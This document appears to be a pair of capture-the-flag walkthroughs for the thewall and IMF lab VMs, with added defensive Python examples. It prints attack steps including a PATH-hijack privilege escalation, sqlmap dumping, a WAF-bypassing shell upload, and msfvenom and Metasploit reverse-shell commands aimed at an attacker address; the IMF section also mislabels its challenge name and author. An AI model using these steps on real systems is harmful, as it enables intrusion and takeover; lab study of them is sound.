Hack the thewall VM (CTF Challenge)

Hello friends! Today we are going to take on another CTF challenge known as thewall. The credit for making this VM goes to “Xerubus”, and it is another boot2root challenge where we have to root the VM to complete it. You can download this VM here.
Let’s Breach!!!
Let us start by finding the IP of the VM (here I have it at 192.168.0.17, but you will have to find your own).
netdiscover


We ran an nmap scan but it showed nothing, so we use arp to check whether the VM is broadcasting anything.

arp -an


We found that it is broadcasting something on the network, so we use Wireshark to check on which port it is sending the data.
We found that it is broadcasting on port 1337, so we use netcat to listen on port 1337.
nc -lvp 1337


We found it was broadcasting something related to Pink Floyd. We run another nmap scan to check whether anything has changed.
nmap -sV 192.168.0.17

As we can see, port 80 is open, so we open this IP in our browser.


We take a look at the page source and find a hexadecimal encoded string.


When we decode it we find an md5 hash and a hint to do steganography.


We crack the md5 hash and find the string divisionbell.


We download the image from the webpage and use steghide to check whether something is hidden inside it. When we try to extract the data it prompts for a password; using the string we decoded above, we find that a text file is hidden inside the image and extract it.
steghide info pink_floyd.jpg
steghide extract -sf pink_floyd.jpg


When we open the text file we find a base64 encoded string, an md5 hash and a hint to use them on port 1965.


First we decode the base64 string and find the string SydBarret.


Then we crack the md5 hash and find the string pinkfloydrocks.


Port enumeration on 1965 shows it is running OpenSSH, so we check whether we can log in with username SydBarret and password pinkfloydrocks.


When we try to log in it tells us that we can only connect through sftp, so we use SydBarrett as username and pinkfloydrocks as password to log in through sftp.


Now that we are inside, we find a file called eclipsed_by_the_moon and download it to our system.



We check what kind of file it is and find that it is a zip file, so we extract it using tar.
file eclipsed_by_the_moon
tar xvfz eclipsed_by_the_moon


After extracting, we check the type of the resulting file and find that it is a boot sector.
file eclipsed_by_the_moon.lsd


We check whether we can recover any files from the boot sector image using testdisk.
testdisk eclipsed_by_the_moon.lsd
We select the image to recover files from.


We select None (non-partitioned media), as it is a boot sector.


We go to Advanced to recover files from the image.


We then select the partition from which we want to extract the files and choose Undelete to recover them.


We find that an image file has been recovered, so we copy it.


We select the directory on our system into which we want to copy the file.


We look at the image we just recovered: it is a picture of Roger Waters, and there is also a password inside the image.


We log in through ssh; enumerating usernames, we find that the username is RogerWaters and the password is hello_is_there_anybody_in_there.
After getting in, we find that there are separate directories for the different Pink Floyd band members.
ls -al


We also find that we have limited access and cannot enter their directories, so we look for binaries owned by the other users and find that NickMason and DavidGilmour own binaries called brick and shineon.
find / -user DavidGilmour 2>/dev/null
find / -user NickMason 2>/dev/null


We don’t have permission to run the binary shineon, but when we run brick it asks us a question. When we answer it correctly we become the user NickMason.


Now we can access the NickMason/ directory. We find an image file inside and use scp to send it to our local system.
scp nick_mason_profile_pic.jpg root@192.168.0.16:/root/Desktop


We check the file type and find that it is actually an audio file, so we rename it from .jpg to .ogg.


When we listen to the audio, we notice morse code playing in the background along with the music. We filter the audio frequencies to isolate the morse code.


.-. .. -.-. .... .- .-. -.. .-- .-.  .. --. .... - .---- ----. ....- ...-- ..-. .. ... .-
The morse code translates to richardwright1943farfisa. We use RichardWright as username and 1943farfisa as password to log in as user RichardWright.
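A small Morse decoder/encoder to check the transcription above. This is an added example, my code rather than anything from the post or the VM; note that the Morse line exactly as printed decodes to richardwright1943fisa, so it is missing the ".- .-." ("ar") of "farfisa".

```python
# Added example (not from the original post): decode/encode Morse and check
# the transcription printed above against the stated translation.
import re

MORSE_TO_CHAR = {
    ".-": "a", "-...": "b", "-.-.": "c", "-..": "d", ".": "e", "..-.": "f",
    "--.": "g", "....": "h", "..": "i", ".---": "j", "-.-": "k", ".-..": "l",
    "--": "m", "-.": "n", "---": "o", ".--.": "p", "--.-": "q", ".-.": "r",
    "...": "s", "-": "t", "..-": "u", "...-": "v", ".--": "w", "-..-": "x",
    "-.--": "y", "--..": "z", ".----": "1", "..---": "2", "...--": "3",
    "....-": "4", ".....": "5", "-....": "6", "--...": "7", "---..": "8",
    "----.": "9", "-----": "0",
}
CHAR_TO_MORSE = {c: m for m, c in MORSE_TO_CHAR.items()}

# The Morse line from the post. Blog software often turns "..." into a single
# ellipsis character and "-" into an en dash; normalize() undoes that.
PAGE_MORSE = (".-. .. -.-. .... .- .-. -.. .-- .-.  .. --. .... - .---- "
              "----. ....- ...-- ..-. .. ... .-")


def normalize(code: str) -> str:
    """Map unicode ellipsis/dashes back to ASCII dots and hyphens."""
    return code.replace("\u2026", "...").replace("\u2013", "-").replace("\u2014", "-")


def decode_morse(code: str) -> str:
    """Letters are separated by spaces, words by '/' or three or more spaces.

    Unknown groups become '?' instead of raising, so one bad group does not
    hide the rest of the message."""
    words = re.split(r"\s{3,}|\s*/\s*", normalize(code).strip())
    return " ".join(
        "".join(MORSE_TO_CHAR.get(tok, "?") for tok in word.split()) for word in words
    )


def encode_morse(text: str) -> str:
    """Encode letters and digits; one space between letters, ' / ' between words."""
    return " / ".join(
        " ".join(CHAR_TO_MORSE[ch] for ch in word) for word in text.lower().split()
    )


if __name__ == "__main__":
    print(decode_morse(PAGE_MORSE))  # richardwright1943fisa: the printed line lacks "ar"
    print(encode_morse("richardwright1943farfisa"))
```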


Now we try to run the binary shineon. After running it we find that it calls mail by name rather than by full path, so we can redirect that call with a symbolic link and PATH to go from RichardWright to DavidGilmour.
ln -s /bin/ksh /tmp/mail
export PATH=/tmp:$PATH
When we now run shineon we become user DavidGilmour.
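The shineon step works because the binary looks up mail through the caller's PATH. As an added example (my code, not from the post or the VM), the check below audits a PATH string for entries an unprivileged user could control and builds the fixed environment a privileged helper should spawn commands with; stat_fn is a hook so the check can be exercised against constructed directory metadata, and SAFE_PATH and DANGEROUS_VARS are my assumptions.

```python
# Added example (not from the original post): find PATH entries that a
# privileged program must not search, and build a fixed environment for it.
import os
import stat
from typing import Callable, Dict, List, Optional, Tuple

# Fixed search path a privileged helper should export instead of inheriting the caller's.
SAFE_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"
# Caller-controlled variables that change how a spawned program loads or parses input.
DANGEROUS_VARS = ("LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT", "IFS", "PATH")

StatFn = Callable[[str], Optional[Tuple[int, int]]]  # entry -> (uid, mode), None if missing


def _stat_uid_mode(entry: str) -> Optional[Tuple[int, int]]:
    """Real-filesystem hook: owner uid and mode bits, or None if the entry does not exist."""
    try:
        st = os.stat(entry)
    except OSError:
        return None
    return st.st_uid, st.st_mode


def untrusted_path_entries(path: str, stat_fn: StatFn = _stat_uid_mode) -> List[str]:
    """Return the PATH entries a setuid helper must not trust.

    An entry is untrusted if it is relative (the empty entry means the current
    directory), missing, not owned by root, or writable by group or others,
    which is exactly why a symlink named mail in /tmp wins the lookup."""
    bad: List[str] = []
    for entry in path.split(":"):
        if not entry.startswith("/"):
            bad.append(entry or ".")
            continue
        info = stat_fn(entry)
        if info is None or info[0] != 0 or info[1] & (stat.S_IWGRP | stat.S_IWOTH):
            bad.append(entry)
    return bad


def hardened_env(env: Dict[str, str]) -> Dict[str, str]:
    """Environment to spawn from a privileged helper: loader/parser knobs dropped, PATH fixed."""
    clean = {k: v for k, v in env.items() if k not in DANGEROUS_VARS}
    clean["PATH"] = SAFE_PATH
    return clean


if __name__ == "__main__":
    # The PATH from the post puts /tmp first, so "mail" would resolve to /tmp/mail.
    print(untrusted_path_entries("/tmp:" + os.environ.get("PATH", "")))
    print(hardened_env(dict(os.environ))["PATH"])
```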


Inside the DavidGilmour/ folder we find a file containing a link.


When we open this link in the browser we find an image with something written on it.



When we decrease the contrast of the image, we find a hexadecimal string.


We also send the image file that we find inside the DavidGilmour/ folder to our system using scp.
scp david_gilmour_profile_pic.jpg root@192.168.0.16:/root/Desktop/


We then run strings on the image file and find the string who_are_you_and_who_am_i.


Now we log in with DavidGilmour as username and who_are_you_and_who_am_i as password.


We are now in the welcometothemachine group, so we move into /var/www/htdocs/welcometothemachine/.


We find a file called PinkFloyd; when we run it, it asks a question. We answer with the hexadecimal string from the image we found on the webpage.


Now we are allowed to get root, as DavidGilmour is added to sudoers after running this program.


When we enter the root/ directory we find the flag marking the end of the VM challenge.


Hack the IMF VM (CTF Challenge)

Hello friends! Today we are going to take on another CTF challenge known as 6days. The credit for making this VM goes to “Geckom”, and it is another CTF challenge where we have to find 6 flags to complete it. You can download this VM here.
Let’s Breach!!!
Let us start by finding the IP of the VM (here I have it at 192.168.0.25, but you will have to find your own).

netdiscover

We use nmap for port enumeration.
nmap -sV 192.168.0.25

We find that port 80 is open, so we open it in our browser.


We take a look at the page source and find a few javascript files whose names look base64 encoded.
Inside the flag we find another base64 encoded string; decoding it gives the string imfadministrator.
We look around the website, and in the source code of the contact.php page we find our 1st flag.

Flag 1 contains a base64 encoded string; decoding it gives the string allthefiles.
We open allthefiles and imfadministrator in the browser and find that imfadministrator is a directory that leads to a login page.

On the contact.php page we found a few email addresses, so we use cewl to build a dictionary.
We use Burp Suite to launch a dictionary attack: we select the position and change the password parameter from a string to an array.

Now we find the third flag in the response.
Now that we can access the page, we see that it might be vulnerable to SQL injection.

Using Burp Suite we save the request to a text file.

We use sqlmap to dump the database.
sqlmap -r /root/Desktop/imf.txt --dbs --batch --dump-all


We find the names of the pages along with another page called tutorial-incomplete. We open it in the browser and find a page with a QR code inside an image.


When we decode the QR code we get our 4th flag.


Inside the flag we find a base64 encoded string; decoding it gives the string uploadr942.php.
We open it in the browser and find a page for uploading a file.

When we try to upload a shell we find that the upload is protected by a WAF, so we create a custom shell and save it as a GIF file to bypass the WAF.


Now we upload the file and check the response from the server to find where our file is uploaded.


We find that the server sends a string in a comment: our file is in the uploads folder, and the comment in the server's response is the name of our file.
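The WAF in this step only looked at what the upload claimed to be. As an added example (my code, not the VM's or the post's), here is a server-side check that validates an image upload by content as well as by name: the declared extension must match the file's magic bytes, files carrying PHP open tags are refused, and the stored name is chosen by the server; the sample inputs in the test are constructed.

```python
# Added example (not from the original post): content-based validation for an
# image upload endpoint. Checking the extension alone is what let a script
# named .gif through. Keeping uploads in a directory where the web server
# never executes scripts is still the primary control; this is a second layer.
import os
import re
import secrets
from typing import Optional

MAGIC = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}
MAX_BYTES = 2 * 1024 * 1024  # assumed size limit for this endpoint
# PHP open tags. A valid GIF header followed by one of these is the classic
# polyglot; a random "<?" inside real image data is rare, and refusing it is cheap.
PHP_TAG = re.compile(rb"<\?(php|=)?", re.IGNORECASE)


def validate_image_upload(filename: str, data: bytes) -> Optional[str]:
    """Return None if the upload is acceptable, otherwise the reason it was refused."""
    name = os.path.basename(filename)
    if name != filename or name.count(".") != 1:
        return "unexpected path or double extension"  # blocks ../x.gif and shell.php.gif
    ext = os.path.splitext(name)[1].lower()
    if ext not in MAGIC:
        return f"extension {ext!r} not allowed"
    if len(data) > MAX_BYTES:
        return "file too large"
    if not data.startswith(MAGIC[ext]):
        return "content does not match declared type"
    if PHP_TAG.search(data):
        return "script markers inside image data"
    return None


def storage_name(filename: str) -> str:
    """Random server-side name with the validated extension, so the client never picks the path."""
    return secrets.token_hex(8) + os.path.splitext(filename)[1].lower()


if __name__ == "__main__":
    # Constructed sample: a GIF header with a PHP open tag right behind it.
    print(validate_image_upload("pic.gif", b"GIF89a<?php /* constructed marker */ ?>"))
    print(validate_image_upload("pic.gif", b"GIF89a" + b"\x00" * 16), storage_name("pic.GIF"))
```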

After finding our shell, we find the 5th flag. Now we use web_delivery in Metasploit to get a reverse shell.


We set up Metasploit for web delivery and execute the generated command in our shell.


Now that we have the reverse shell, we take a look inside the 5th flag.


We find a base64 encoded string; decoding it gives the string agentservices.
We check the connections on the server using netstat.
netstat -antp


We find a service running on port 7788, so we use curl to find out what the server is running on port 7788.
curl localhost:7788

We find that a service called agent is running, so we locate the agent binary using the which command.
which agent


So we knock on the server and find that port 7788 is opened.
knock 192.168.0.25 7482 8279 9467


Now we download the agent binary to our system for reverse engineering.
download agent /root/Desktop


Now we reverse engineer the binary to find an exploitable bug. First we disassemble the main function.
gdb -q agent
disassemble main



We set a breakpoint at 0x80486ba and run the program. Once it stops there, we inspect the registers to find the memory locations the program is using.
break *0x80486ba
info registers


We look at four words of memory (x/4xw) just above the stack pointer.
x/4xw 0xffffd340


At memory address 0x804c070 we find the password used to access the program.
x/s 0x0804c070


Now we connect to the program on the server using netcat and confirm that this string gives us access to it.
netcat 192.168.0.25 7788


Now we write an exploit for this program. First we generate shellcode with msfvenom, excluding the bad characters.
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.15 lport=4444 -f python -b '\x00\xa0\x0d'


Now we write our exploit in python, manually fuzzing the memory location inside the exploit.


We set up our handler in Metasploit (the payload must match the one given to msfvenom) and then run the exploit.
msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.15
msf exploit(handler) > set lport 4444
msf exploit(handler) > run


Now we check for sessions and take the interactive shell.
msf exploit(handler) > sessions
msf exploit(handler) > sessions -i 3


Now we take a shell and check our privileges: we find that we are root. When we move into the /root/ folder we find our 6th and final flag.